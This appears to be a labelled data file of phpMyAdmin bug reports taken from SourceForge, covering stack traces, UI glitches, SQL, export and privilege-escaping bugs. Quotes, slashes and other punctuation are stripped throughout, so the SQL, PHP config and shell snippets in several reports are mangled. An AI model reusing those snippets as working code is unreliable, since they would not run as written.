FastCGI stderr PHP Fatal error Maximum function nesting level of 100 reached, aborting!
in libraries tcpdf tcpdf.php on line 25145 PHP Stack trace PHP 1.
\{main\} ) export.php 0 PHP 2.
PMA exportData ) export.php 467 PHP 3.
PMA Export PDF gt;mysql report ) libraries export pdf.php 449 PHP 4.
TCPDF gt;AddPage ) libraries export pdf.php 337 PHP 5.
TCPDF gt;startPage ) libraries tcpdf tcpdf.php 3899 PHP 6.
TCPDF gt;setHeader ) libraries tcpdf tcpdf.php 3987 PHP 7.
PMA Export PDF gt;Header ) libraries tcpdf tcpdf.php 4301 PHP 8.
TCPDF gt;MultiCell ) libraries export pdf.php 104 PHP 9.
TCPDF gt;Write ) libraries tcpdf tcpdf.php 6419 PHP 10.
TCPDF gt;Cell ) libraries tcpdf tcpdf.php 7069 PHP 11.
PMA Export PDF gt;checkPageBreak ) libraries tcpdf tcpdf.php 5672 PHP 12.
TCPDF gt;AddPage ) libraries export pdf.php 55 PHP 13.
TCPDF gt;startPage ) libraries tcpdf tcpdf.php 3899 PHP 14.
TCPDF gt;setHeader ) libraries tcpdf tcpdf.php 3987 PHP 15.
PMA Export PDF gt;Header ) libraries tcpdf tcpdf.php 4301 PHP 16.
TCPDF gt;MultiCell ) libraries export pdf.php 104 PHP 17.
TCPDF gt;Write ) libraries tcpdf tcpdf.php 6419 PHP 18.
TCPDF gt;Cell ) libraries tcpdf tcpdf.php 7069 PHP 19.
PMA Export PDF gt;checkP ... PHP 84.
TCPDF gt;AddPage ) libraries export pdf.php 55 PHP 85.
TCPDF gt;startPage ) libraries tcpdf tcpdf.php 3899 PHP 86.
TCPDF gt;setHeader ) libraries tcpdf tcpdf.php 3987 PHP 87.
PMA Export PDF gt;Header ) libraries tcpdf tcpdf.php 4301 PHP 88.
TCPDF gt;MultiCell ) libraries export pdf.php 104 PHP 89.
TCPDF gt;Write ) libraries tcpdf tcpdf.php 6419 PHP 90.
TCPDF gt;Cell ) libraries tcpdf tcpdf.php 7069 PHP 91.
PMA Export PDF gt;checkPageBreak ) libraries tcpdf tcpdf.php 5672 PHP 92.
TCPDF gt;AddPage ) libraries export pdf.php 55 PHP 93.
TCPDF gt;endPage ) libraries tcpdf tcpdf.php 3897 PHP 94.
TCPDF gt;setFooter ) libraries tcpdf tcpdf.php 3915 PHP 95.
TCPDF gt;setGraphicVars ) libraries tcpdf tcpdf.php 4330 PHP 96.
TCPDF gt;SetFont ) libraries tcpdf tcpdf.php 25018 PHP 97.
TCPDF gt;SetFontSize ) libraries tcpdf tcpdf.php 5242 PHP 98.
TCPDF gt; out ) libraries tcpdf tcpdf.php 5283 PHP 99.
TCPDF gt;setPageBuffer ) libraries tcpdf tcpdf.php 13030 Seen on demo server on current master, I have no clue how to trigger this.
Original URL https sourceforge.net p phpmyadmin bugs 3519 Original author nijel Found in version Latest Git","bug"
"24444","9915","Tabs on server status page don t work with microhistory.
Hitting the back button in the browser after navigating in a few tabs of the server status page brings you back to the previous page, rather than the previous tab.
Original URL https sourceforge.net p phpmyadmin bugs 3720 Original author roccivic Found in version Latest Git","bug"
"24444","9916","cfg[ ShowTooltipAliasTB ] and navigation labels.
When cfg[ ShowTooltipAliasTB ] is set to true and no tables comments are set, the navigation shows only the table icons.
When table comment is not set for a particular table, table name should be displayed.
Original URL https sourceforge.net p phpmyadmin bugs 3520 Original author madhuracj Found in version 3.4.0","bug"
"24444","9917","PMA Settings UI unable to override config.inc.php.
Overriding a value defined in config.default.php in config.inc.php makes it impossible to re override the value to its default defined in config.default.php) in Settings UI.
For ex.
Default value of cfg[ ShowTooltipAliasTB ] is false in config.default.php.
If you override it in config.inc.php to true, you can t re override it in Settings UI back to false.
Original URL https sourceforge.net p phpmyadmin bugs 3521 Original author madhuracj Found in version 3.4.0","bug"
"24444","9918","Tracker consumes too much memory sometimes.
FastCGI stderr PHP Fatal error Allowed memory size of 134217728 bytes exhausted tried to allocate 32 bytes) in libraries Tracker.class.php on line 669 PHP Stack trace PHP 1.
\{main\} ) import.php 0 PHP 2. include ) import.php 394 PHP 3.
PMA importRunQuery ) libraries import csv.php 448 PHP 4.
PMA DBI try query ) libraries import.lib.php 130 PHP 5.
PMA Tracker handleQuery ) libraries database interface.lib.php 170 PHP 6.
PMA Tracker parseQuery ) libraries Tracker.class.php 869 PHP 7. array map ) libraries Tracker.class.php 669 Again, seen on demo server, I don t know how to reproduce.
Original URL https sourceforge.net p phpmyadmin bugs 3522 Original author nijel Found in version Latest Git","bug"
"24444","9919","Double navigation frame.
With 3.5rc1 when I open a direct link to a table Browse tab, after the login the navigation frame left) is duplicated and the main frame is empty.
For example following this link https SERVER phpmyadmin sql.php?db=DATABASE table=TABLE pos=0 Before this versions I had no problems.
Using phpMyAdmin 3.5.0 rc1 Apache 2.2.16 Ubuntu) MySQL 5.1.49 1ubuntu8.1 Tried with Firefox, Explorer and Chrome) Original URL https sourceforge.net p phpmyadmin bugs 3523 Original author hastms Found in version 3.5.0","bug"
"24444","9920","Broken includes on sql.php.
After execuring a query, sql.php sometimes includes another file as a redirect) to show a page under the results of the executed query.
However this does not happen during ajax requests and therefore neither it does during ajax requests for a page, thus leaving an empty space below the query results.
Original URL https sourceforge.net p phpmyadmin bugs 3724 Original author roccivic Found in version Latest Git","bug"
"24444","9921","Wrong checkbox behaviour and query creating.
I have a simple mysql table.
It contains two column and doesn t contain any unique column id, number etc.)
If there are two or more lines which contain same value, i can do any operation for all of them.
You can reproduce error with this table schema and data and with these steps CREATE TABLE `history` `ip` varchar 255) NOT NULL, `url` text NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8 INSERT INTO `history` VALUES , http www.someurl.org ), , http www.someurl.org ); Open browse page for table, Click checkbox of firstline, Click checkhox of secondline First error when you check second line it doesn t work properly at first click.)
Click again checkbox of secondline.
Both of checboxes should be selected now.
Click delete selecteds Second error it deletes only one of them.)
Original URL https sourceforge.net p phpmyadmin bugs 3524 Original author dirigeant Found in version 3.5.5","bug"
"24444","9922","Slow Displaying Database.
I m coming from an older version of phpMyAdmin I can t remember but I want to say 3.0.something).
I worked through and got 3.5.0 rc1 setup.
It displays everything correctly shows the mysql, information schema and my actual production database.
Everything works wonderfully until I get to the production database.
Once I try to load that, it takes forever to actually show the tables.
Eventually it does but the left side panel table list) doesn t load.
Typically I ll get the standard Timed Out in that panel but a chunk of the tables will load on the right side with their information.
And click on the tables in the right side will fairly quickly load the details on the table.
This only seems to work when I use mysql rather than mysqli.
If I try with mysqli then it NEVER loads the product database.
In any case, I have to restart the httpd service to get back to the main phpMyAdmin screen or anywhere else after I try to load the product server.
Coming from CentOS, Apache 2.2.3, PHP 5.5.21 Original URL https sourceforge.net p phpmyadmin bugs 3525 Original author shults Found in version 3.5.0","bug"
"24444","9923","Incorrect page after expired session.
After a user s session is expired, it is necessary to reload the page in order to see the login form and be able to login again into pma.
However, after logging in, the main page will be show to the user instead of the page where the user was previously.
Original URL https sourceforge.net p phpmyadmin bugs 3727 Original author roccivic Found in version Latest Git","bug"
"24444","9924","Duplicate inline query edit box.
Originally reported on the mailing list by toddsheet Click the Inline link to edit the current SQL statement.
Click it again.
It doubles up the statement.
If you d made changes before accidentally clicking it again the previous statement appears in the 2nd box.
I can t imagine this being by design.
Original URL https sourceforge.net p phpmyadmin bugs 3526 Original author roccivic Found in version 3.5.0","bug"
"24444","9925","Error in setup.
PHP Warning uasort ) expects parameter 2 to be a valid callback, function PMA language cmp not found or invalid function name in setup frames index.inc.php on line 22 012 Original URL https sourceforge.net p phpmyadmin bugs 3729 Original author nijel Found in version Latest Git","bug"
"24444","9926","Multiple navigation panels on page reload.
Go to the table structure page of any table and reload the page.
You ll see multiple navigation frames and no content in the main frame see attached screenshot).
Tested on firefox.
I believe this is different from both [1] and [2] since this particular bug is in the master, but not in QA 3 5.
And commit fa02a8669ddceeb77367a420a1a84dd303a2b297 is the first bad commit.
[1] http sourceforge.net tracker ?func=detail aid=3492945 group id=23067 atid=377408 [2] http sourceforge.net tracker ?func=detail aid=3486525 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin bugs 3527 Original author madhuracj Found in version Latest Git","bug"
"24444","9927","Inline query editing broken after row update.
If I edit a row or several rows, when I go back to the page showing results, the query editor doesn t work properly.
If I click Inline it shows in plain text, not the syntax highlighted version, and clicking the Go button does nothing.
Original URL https sourceforge.net p phpmyadmin bugs 3730 Original author anonymous Found in version 3.5.3","bug"
"24444","9928","Incorrect break statement.
This is present in master and not in QA 3 5.
PHP Fatal error Cannot break continue 1 level in server privileges.php on line 1095 PHP Stack trace PHP 1.
\{main\} ) server privileges.php 0 012 It looks like switch statement was removed, while some break statements were left, this should be somehow handled.
Original URL https sourceforge.net p phpmyadmin bugs 3528 Original author nijel Found in version Latest Git","bug"
"24444","9929","Font size in query editor is way too big!.
The font size on the inline query editor when syntax highlighting is on) is way too big.
Only 3 lines of a query can fit in the box at once.
The problem is the .CodeMirror class, it sets the size to 140 .
That property should just be removed entirely.
Original URL https sourceforge.net p phpmyadmin bugs 3731 Original author anonymous Found in version 3.5.3","bug"
"24444","9930","Unterminated JS string error.
After view the structure page of an empty table all of links stops working non ajax links and db list pagination on left works fine).
browser google chrome 23.0.1271.64 m server your demo server 2 phpMyAdmin demo MySQL) ver 4.0.0 dev Git revision 397c5b8 from master branch, committed on 2012.
Nov 10.
21 09 by Marc Delisle chrome error console Uncaught SyntaxError Unexpected token ILLEGAL gt; gt; gt; gt; db structure.php 1 Opera fails 12.02 too, here s the console Syntax error at line 1 in event handler expected ) , got lt;invalid token gt; kell hozzxc3xa1adnia., 1) Script compilation index.php Uncaught exception TypeError Cannot convert this).data onsubmit ,this.onsubmit) to object Error thrown at line 1, column 8526 in lt;anonymous function gt; ) in http demo.phpmyadmin.net master js ajax.js?ts=1352556926 this).data onsubmit ,this.onsubmit).attr onsubmit , ) called via Function.prototype.call ) from unknown location in lt;anonymous function each gt; b0, b3, bZ) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 no source available called from line 16, column 4944 in lt;anonymous function each gt; bY, bX) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 return bC.each this,bY,bX) called from line 1, column 8379 in lt;anonymous function gt; ) in http demo.phpmyadmin.net master js ajax.js?ts=1352556926 form ).not .ajax ).not .disableAjax ).each function )\{if this).attr onsubmit ))\{ this).data onsubmit ,this.onsubmit).attr onsubmit , )\}\}) called via Function.prototype.apply ) from line 16, column 61423 in lt;anonymous function handle gt; by) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 by.handleObj=bw; called from line 16, column 54317 in lt;anonymous function bx gt; bF) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 return typeof b!== undefined !bF||b.event.triggered!==bF.type)?b.event.handle.apply bx.elem,arguments) K called from line 16, column 59161 in lt;anonymous function trigger gt; e, by, bw, bD) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 bz.apply bC,by) called from line 16, column 75557 in lt;anonymous function trigger gt; ) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 b.event.trigger e,bs,this) called from unknown location in lt;anonymous function each gt; b0, b3, bZ) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 no source available called from line 16, column 4944 in lt;anonymous function each gt; bY, bX) in http demo.phpmyadmin.net master js jquery jquery 1.6.2.js?ts=1352556933 return bC.each this,bY,bX) Original URL https sourceforge.net p phpmyadmin bugs 3732 Original author shanroo88 Found in version Latest Git snapshot","bug"
"24444","9931","Incorrect UPDATE command when columns have comments.
When inline editing a column in a row that has a column comment, the comment is included in the UPDATE query and breaks it, forcing a manual edit.
For example, a username field with a comment of The user s username will result in a query similar to the following UPDATE somedb.users SET `name The user s username` = Changed WHERE users.id = 1 Original URL https sourceforge.net p phpmyadmin bugs 3530 Original author minitechme Found in version 3.5.0","bug"
"24444","9932","Transformation description missing in the tooltip.
As pointed out in [1], the tooltip in the Browser transformation dropdown does not contain the description provided in the transformation file.
[1] https sourceforge.net mailarchive message.php?msg id=28976270 Original URL https sourceforge.net p phpmyadmin bugs 3531 Original author madhuracj Found in version 3.4.0","bug"
"24444","9933","interface broken after login at table structure page.
I was viewing the structure of the table and refresh login the page due to non activity.
after login I saw the interface of PMA was broken.
I m attaching the screenshot.
have a look.
Original URL https sourceforge.net p phpmyadmin bugs 3532 Original author hiddenpearls Found in version Latest Git","bug"
"24444","9934","JSON unescaped for allegedly numeric columns.
if there is a varchar column with the value 04 the json export will not be escaped.
Example Table structure for table `test` CREATE TABLE IF NOT EXISTS `test` `testcolumn` varchar 255) NOT NULL ); Dumping data for table `test` INSERT INTO `test` `testcolumn`) VALUES test ), 04 ), 4 ); the var dump is numeric 04 )); = gt; true var dump is numeric 4 )); = gt; true var dump is numeric 4)); = gt; true Original URL https sourceforge.net p phpmyadmin bugs 3533 Original author anonymous","bug"
"24444","9935","Turn off autocapitalize and autocorrect on text.
Hi, logging into phpMyAdmin from an iOS device is frustrating because the device uppercases the first letter automatically.
This can be disabled on a per field basis by adding two attributes to the input tag and setting them both to off.
For example lt;input type= text autocapitalize= off autocorrect= off id= fields label name= fields[label] value= gt; Other browsers simply ignore these attributes.
I believe I wrote a script that fixed every page for myself automatically.
Just run it from inside the phpMyAdmin directory.
Perhaps this would be useful to add to your project.
grep Rl type=\ text\ | while read f; do echo f; sed i s input type=\ text\ input type=\ text\ autocapitalize=\ off\ autocorrect=\ off\ g f; done Thanks, Brian Server Localhost via UNIX socket Server version 5.1.61 0 squeeze1 Protocol version 10 User root localhost MySQL charset UTF 8 Unicode utf8) Web server Apache 2.2.16 Debian) MySQL client version 5.1.61 PHP extension mysqli phpMyAdmin Version information 3.4.10.1 Original URL https sourceforge.net p phpmyadmin bugs 3534 Original author anonymous","bug"
"24444","9936","Grid editing does not work after session expire.
This bug is similar to https sourceforge.net tracker ?func=detail aid=3469203 group id=23067 atid=377408, but different so I created a new bug report Open a table in browse mode wait for the session to expire edit a cell and press enter Updating seems to strats, but because the session is expired, nothing happens.
You don t get a session expired warning or a login screen.
Fix check if session is still active when launching an AJAX request.
Original URL https sourceforge.net p phpmyadmin bugs 3535 Original author ruleant Found in version Latest Git","bug"
"24444","9937","reverting sort on joined column does not work.
When browsing the results of a SELECT statement with JOINed tables, it is possible to sort on a column of the joined table) by clicking it, but when clicking it again, the order is not reversed.
This happens both in the 3.4 branch as in current master Original URL https sourceforge.net p phpmyadmin bugs 3536 Original author ruleant Found in version 3.4.10","bug"
"24444","9938","Chrome Selecting database on navi panel Nothing happens.
When I select a database from drop down select on the navigation panel, absolutely nothing happens.
OS Ubuntu Linux 10.04, Chrome 17.0.963.79) In Firefox it works properly.
Original URL https sourceforge.net p phpmyadmin bugs 3537 Original author anonymous Found in version 3.4.10","bug"
"24444","9939","Force SSL redirects to port 80.
If Force SSL for the phpmyadmin server is enabled, after login, users are redirected to port 80 on the secure server.
i.e., login at http phpmyadmin.
[domain] or https phpmyadmin.
[domain] redirects after login to https phpmyadmin.
[domain] 80 [rest of path] This generates an error.
IMO, this should go to https phpmyadmin.
[domain] [rest of path] ) Original URL https sourceforge.net p phpmyadmin bugs 3538 Original author anonymous Found in version 3.5.0","bug"
"24444","9940","Limit clause ignored when sort order is remembered.
Steps to reproduce Enable remember sort order feature and make PMA remember the sort order for a particular table.
Browse the table and then edit the usual browse table query to add a limit clause.
The added limit clause is ignored.
Original URL https sourceforge.net p phpmyadmin bugs 3539 Original author madhuracj Found in version 3.5.0","bug"
"24444","9941","View name not seen in navi panel.
The navi panel shows VIEW instead of the view name.
Does not happen with mysqlnd but happens with libmysql 5.1.55 PHP 5.3.10.
Original URL https sourceforge.net p phpmyadmin bugs 3540 Original author lem9 Found in version 3.5.0","bug"
"24444","9942","Import error when tracking version auto create true.
If I set tracking version auto create true, import fails with an error like SHOW FULL COLUMNS FROM `j beta scotland org uk`.`of` MySQL said Documentation 1146 Table j beta scotland org uk.of doesn t exist phpMyAdmin Version information 3.4.10.1 Server version 5.5.22 log Original URL https sourceforge.net p phpmyadmin bugs 3541 Original author bellra Found in version 3.4.10","bug"
"24444","9943","Right frame reloads after displaying SQL result.
When performing a SELECT sql query that returns empty result set containing zero rows, the right content frame reloads after momentarily displaying the results.
1\.
Open the SQL tab without selecting any database i.e.
from the main page).
2\.
Run any SQL SELECT query that would return zero rows.
phpMyAdmin latest git MySQL 5.1.58 1ubuntu1 Ubuntu) Similar Bug https sourceforge.net tracker ?func=detail aid=3398788 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin bugs 3543 Original author atul5 Found in version Latest Git","bug"
"24444","9944","Multiple Navigation panels bug still present.
Here is the procedure to reproduce the bug 1\.
Open any table from the list of tables in a database.
2\.
Now you are on the structure browse page for that table.
3\.
Wait for the session to expire.
Can change that 1440 value to something else temporarily) 4\.
Now click on any of the Browse Structure SQL Insert tabs, u ll be taken to login screen.
5\.
Login again and u see 2 3 navigation panels with no content frame.
phpMyAdmin latest git MySQL 5.5.17 4 Debian) Can be reproduced on the master demo server.
Original URL https sourceforge.net p phpmyadmin bugs 3545 Original author atul5 Found in version Latest Git","bug"
"24444","9945","Erroneous advisor rule.
Once, Advisor thought that 16 is larger than 128.
I can t reproduce the issue though... See attached screenshot Original URL https sourceforge.net p phpmyadmin bugs 3749 Original author roccivic Found in version 3.5.4","bug"
"24444","9946","Error in create user underscore create database.
With the current release 3.4.10.2) Go to Privileges Add a new User Create a user with Create database with same name and grant all privileges and an underscore in his name In SQL, phpmyadmin do CREATE USER web toto localhost IDENTIFIED BY ; GRANT USAGE ON .
TO web toto localhost IDENTIFIED BY WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 MAX USER CONNECTIONS 0 ; CREATE DATABASE IF NOT EXISTS `web toto` ; GRANT ALL PRIVILEGES ON `web toto` .
TO web toto localhost ; Why phpmyadmin doesn t backslash in the last line ?
GRANT ALL PRIVILEGES ON `web\ toto` .
TO web toto localhost ; I choose Create database with same name and not Create databases with approximatly the same name Now my user can do create database webAtoto, webBtoto, ...
It s a bug or a feature ?
;) Best regards, Julien Original URL https sourceforge.net p phpmyadmin bugs 3546 Original author anonymous Found in version 3.4.10","bug"
"24444","9947","Importing csv into table fails.
When trying to update data in table from csv file, instead of updating the selected table, phpMyAdmin displays the success message saying the data was successfully created or updated.
However the tablename given does not match the selected table name.
I attached the test csv file as well.
Action to reproduce I created several rows in my company table.
Export a row using the default csv settings.
Edit the row of the csv file.
click import, select my csv file and upload.
Expected Result The row in the company table would be updated from the data in the csv file where the ids match.
Additional Information phpMyAdmin tried to create TABLE [51 60] when I uploaded the csv file.
It successfully created table 51 59.
On table 60, It says the table was created successfully; however the table does not exist.
I dropped tables 51 59 and tried re uploading the csv file, now phpMyAdmin says successfully created TABLE 51; however, the table has never been recreated.
Original URL https sourceforge.net p phpmyadmin bugs 3751 Original author rickey kanban Found in version Latest Git","bug"
"24444","9948","Profiling chart shows wrong data.
While executing a query, MySQL performs tasks like checking permission or sending data more than one time as can be seen in profiling data.
When drawing the chart for profiling data, PMA does not aggregate the similar ones to show the total time spent on checking permission or sending data .
Instead the duration of the last occurrence is used.
Original URL https sourceforge.net p phpmyadmin bugs 3547 Original author madhuracj Found in version 3.4.0","bug"
"24444","9949","Error in SQL in every table).
This has happened in previous version searched google and got some mailing list archives of the same problem), but I just downloaed the latest version and got this error on every table.
SELECT tracking active FROM.WHERE db name = dennis AND table name = classes ORDER BY version DESC MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near WHERE db name = dennis AND table name = classes ORDER BY version DESC at line 1 Open new phpMyAdmin window There is no table as I do not need it, and is happening on every table in phpMyAdmin.
Thank you Original URL https sourceforge.net p phpmyadmin bugs 3548 Original author anonymous Found in version 3.5.0","bug"
"24444","9950","JS includes missing in auth config error page.
sample config lt;?php This example configuration shows how to configure phpMyAdmin for many hosts that all have identical configuration otherwise.
To add a new host, just drop it into hosts below.
Contributed by Matthew Hawkins.
i=0; hosts = array foo.example.com , bar.example.com , baz.example.com , quux.example.com , ); foreach hosts as host) \{ i ; cfg[ Servers ][ i][ host ] = host; cfg[ Servers ][ i][ port ] = ; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ extension ] = mysqli ; cfg[ Servers ][ i][ compress ] = FALSE; cfg[ Servers ][ i][ controluser ] = pma ; cfg[ Servers ][ i][ controlpass ] = pmapass ; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = ; cfg[ Servers ][ i][ password ] = ; cfg[ Servers ][ i][ only db ] = ; cfg[ Servers ][ i][ verbose ] = ; cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ designer coords ] = pma designer coords ; \} on index page with auth error in JS console i see Uncaught ReferenceError is not defined When you select a server from the list, respectively, nothing happens.
Original URL https sourceforge.net p phpmyadmin bugs 3549 Original author pavelvd Found in version 3.5.0","bug"
"24444","9951","path not found .
locale , check your language directory.. i get this error unless i create the folder by hand mkdir usr share phpmyadmin locale i think the errormessage should be changed to path not found usr share phpmyadmin locale , create the language directory with mkdir and chown it to the right user) or so Original URL https sourceforge.net p phpmyadmin bugs 3550 Original author rubo77 Found in version 3.4.0","bug"
"24444","9952","Ascending Descending Sort Not working.
I have noticed that the descending sort order by) does not work in the table view when using the order by in sql.
In the table view if I use the following sql command SELECT field1, count ) AS count FROM `tablename` WHERE 1 GROUP BY field1 I then click the count field and it sort the results as SELECT field1, count ) AS count FROM `tablename` WHERE 1 GROUP BY field1 ORDER BY `count` ASC If I click the count field again it should execute the comment SELECT field1, count ) AS count FROM `tablename` WHERE 1 GROUP BY field1 ORDER BY `count` DESC But it continue to sort the results ascending.
Original URL https sourceforge.net p phpmyadmin bugs 3552 Original author anonymous Found in version 3.4.7","bug"
"24444","9953","copy paste with middle mouseclick in colored sqlbox.
i have this problem i cannot paste any text into the coloured sql query textarea with the middle mousebutton.
it seems, the javascript is blocking the pasting by middle click copy paste with Ctrl C and V works.
tested on linux Ubuntu 11.4 on phpmyadmin ver.
4.0.0 dev Original URL https sourceforge.net p phpmyadmin bugs 3554 Original author rubo77 Found in version Latest Git","bug"
"24444","9954","Export ODT, Word, Texy show table structure twice.
Export any database or table as a Open Document Text format.
In the resulted document the table structure description s) under Table structure for table my table ) is displaying twice.
At the top and at the bottom.
The data is displaying at the middle.
I have attached a document which I got by exporting a database.
PMA version 4.0.0 dev As well I checked with PMA version 3.3.2deb1 which is older) Original URL https sourceforge.net p phpmyadmin bugs 3555 Original author chanaka777","bug"
"24444","9955","chart title is getting wrong within chart export.
If I change the chart title eg xe2x80x9ctest titlexe2x80x9d) and export this graph the exported png, svg or print includes the standard title xe2x80x9cChart Titlexe2x80x9d Original URL https sourceforge.net p phpmyadmin bugs 3557 Original author anonymous Found in version 3.5.0","bug"
"24444","9956","Query error after search.
1\.
Go to http demo.phpmyadmin.net master config 2\.
Click test database and click table name editor for view 3\.
Click Search tab 4\.
Write some exist value in the search field 65454 ) and press Go button 5\.
Click field data area, write new field value in the tehtarea and try commit this change.
6\.
See SQL error SQL query Edit Edit UPDATE `test`.`editor` SET `fieldname the comment` = 65454yy WHERE `editor`.`fieldname` =65454 LIMIT 1 MySQL said Documentation 1054 Unknown column fieldname the comment in field list Table structure for table `editor` CREATE TABLE IF NOT EXISTS `editor` `fieldname` int 5) NOT NULL COMMENT the comment ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Dumping data for table `editor` INSERT INTO `editor` `fieldname`) VALUES 678944), 65454); Original URL https sourceforge.net p phpmyadmin bugs 3559 Original author lblss Found in version 3.5.0","bug"
"24444","9957","foreign columns doesn t change back after quick editing.
1\.
Open data browser of any table with constraits to othe table 2\.
Click quick edit on any record 3\.
Click save even if you haven t changed something) 4\.
Selector of constrait is presentend like you are in editing mode Sorry for my english.
Original URL https sourceforge.net p phpmyadmin bugs 3560 Original author anonymous Found in version 3.4.10","bug"
"24444","9958","More actions in table structure.
The More should not be substituted for the action links if there is horizontal room on the line.
Therefore it should have the same behavior as in the menu tabs.
Also, if only the icons are showing, no need to use the More technique.
Original URL https sourceforge.net p phpmyadmin bugs 3561 Original author lem9 Found in version 3.5.0","bug"
"24444","9959","Chart special chars not displayed correctly.
Like the following sql the special chars or are not displayed or wrong displayed.
see atached image) SELECT 2, Value1 with Slash \ and And char , Group with Slash \ and And char UNION ALL SELECT 2, Value2 with Backslash and Dollar char , Group with Slash \ and And char UNION ALL SELECT 2, Value3 with lparagraph xc2xa7 and Precent char , Group with Slash \ and And char UNION ALL SELECT 2, Other chars xc2xb0xc2xa7xc2xac|xc2xa2xc2xb4 ]\}\{ , Group with Slash \ and And char UNION ALL SELECT 3, Value1 with Slash \ and And char , Group with Backslash and Dollar char UNION ALL SELECT 3, Value2 with Backslash and Dollar char , Group with Backslash and Dollar char UNION ALL SELECT 3, Value3 with lparagraph xc2xa7 and Precent char , Group with Backslash and Dollar char UNION ALL SELECT 3, Other chars xc2xb0xc2xa7xc2xac|xc2xa2xc2xb4 ]\}\{ , Group with Backslash and Dollar char UNION ALL SELECT 4, Value1 with Slash \ and And char , Group with language xc3xbc and Precent char UNION ALL SELECT 4, Value2 with Backslash and Dollar char , Group with paragraph xc2xa7 and Precent char UNION ALL SELECT 4, Value3 with lparagraph xc2xa7 and Precent char , Group with paragraph xc2xa7 and Precent char UNION ALL SELECT 4, Other chars xc2xb0xc2xa7xc2xac|xc2xa2xc2xb4 ]\}\{ , Group with lparagraph xc2xa7 and Precent char Original URL https sourceforge.net p phpmyadmin bugs 3563 Original author anonymous Found in version 3.5.0","bug"
"24444","9960","Structure window > drop link.
Open separate table structure.
Select column, click Drop.
Uncaught TypeError Cannot call method replace of undefined event.layerX and event.layerY are broken and deprecated in WebKit.
They will be removed from the engine in the near future.
Functions.js line 118 CHROME Btw.
nice fucking idea to use JQuery!!
Yes, irony!
Original URL https sourceforge.net p phpmyadmin bugs 3565 Original author anonymous Found in version 3.5.0","bug"
"24444","9961","unescaped wildcards when checking for privileges.
According to http dev.mysql.com doc refman 5.1 en request access.html, wildcard characters have to be quoted in GRANT statements and are therefore stored as e.g.
db\ 1 in the TABLE SCHEMA.SCHEMA PRIVILEGES table.
PMA currentUserHasPrivilege ), however, does not consider this and queries for the unquoted name WHERE TABLE SCHEMA= s ) in common.lib.php at line 3747.
Thus the SCHEMA PRIVILEGES can never be found.
Maybe you can add a is privileges flag to PMA sqlAddSlashes ) and quote wildcards like and there.
Original URL https sourceforge.net p phpmyadmin bugs 3566 Original author leofeyer Found in version 3.5.0","bug"
"24444","9962","Table structure page, More drop box after resize not work.
Action columns on table structure page are hidden and moved to More drop down box.
Column with More is appeared during loading page depends on css).
Using maximize window function everything is OK but using resizing window action columns are move to drop down and the drop down won t show after mouse over.
Reproduce 1\.
Open table structure 2\.
Maximize browser window from maximum.
Drop down is displayed correctly.
3\.
Resize browser window, action columns are move to drop down 4\.
Mouse over action on More won t do anything drop down is not shown).
Latest GIT version, FF 11, Chrome 17 Chromium) at Debian wheezy, xfce4.
Please, confirm it.
Original URL https sourceforge.net p phpmyadmin bugs 3567 Original author janpecek Found in version Latest Git","bug"
"24444","9963","LIMIT 0,30 added to SQL SELECT.
When I type a SELECT statement into the SQL box, pMA adds an unwanted LIMIT 0,30 at the end of it.
I understand the use of this for browsing, but when I enter my own SQL I want it executed as I enter it.
Original URL https sourceforge.net p phpmyadmin bugs 3568 Original author anonymous Found in version 3.5.0","bug"
"24444","9964","Double escaped error message.
When installing phpmyadmin on a server without mysql php module, the error message is double escaped and is displayed like Die Erweiterung mysqli fehlt.
Bitte die PHP Konfiguration xc3xbcberprxc3xbcfen.
lt;a href= Documentation.html faqmysql target= documentation gt; lt;img src= themes dot.gif title= Dokumentation alt= Dokumentation class= icon ic b help gt; lt; a gt; Don t know if this has security implications.
Original URL https sourceforge.net p phpmyadmin bugs 3768 Original author anonymous Found in version 3.5.5","bug"
"24444","9965","Error messages do not appear in the Designer.
I tried Designer to set relations between my tables using Firefox 11.0, IE 9 and Chrome 18 all latest versions) and couldn t accomplish anything.
The Create Relation button is clickable in all browsers and it allows you to select your Reference and Foreign Keys but when it asks Create Relation?
and I hit OK, sometimes nothing happens, other times a small window pops up with blank content and in Firefox the URL is similar to this about blank is shown in the URL in IE) http 127.0.0.1 phpmyadmin pmd general.php?db=cylbs server=1 token=ac75cafb185fd979bd16162c551d3288 I check the tables and no relation has been set whatsoever.
I hope that this is a known bug as I have a project to finish and I am unable due to this.
Thank you so much I hope you can help.
Original URL https sourceforge.net p phpmyadmin bugs 3569 Original author anonymous Found in version 3.5.0","bug"
"24444","9966","Multiple row selection problem.
Hey!
I have a problem in phpmyadmin, If i select more than one table entries and click edit, the message comes No datasets selected.
Please help.
KR Markus Original URL https sourceforge.net p phpmyadmin bugs 3571 Original author fifa4u Found in version 3.5.0","bug"
"24444","9967","No tables shown because of privileges of views.
Old tracker 3601233) I have a problem with one database.
I have imported it with a backup script and everything worked fine.
But phpMyAdmin does not show any tables in the left navigation although there are a lot.
And there was no error message.
When I execute SHOW TABLES FROM database xyz; all tables are shown.
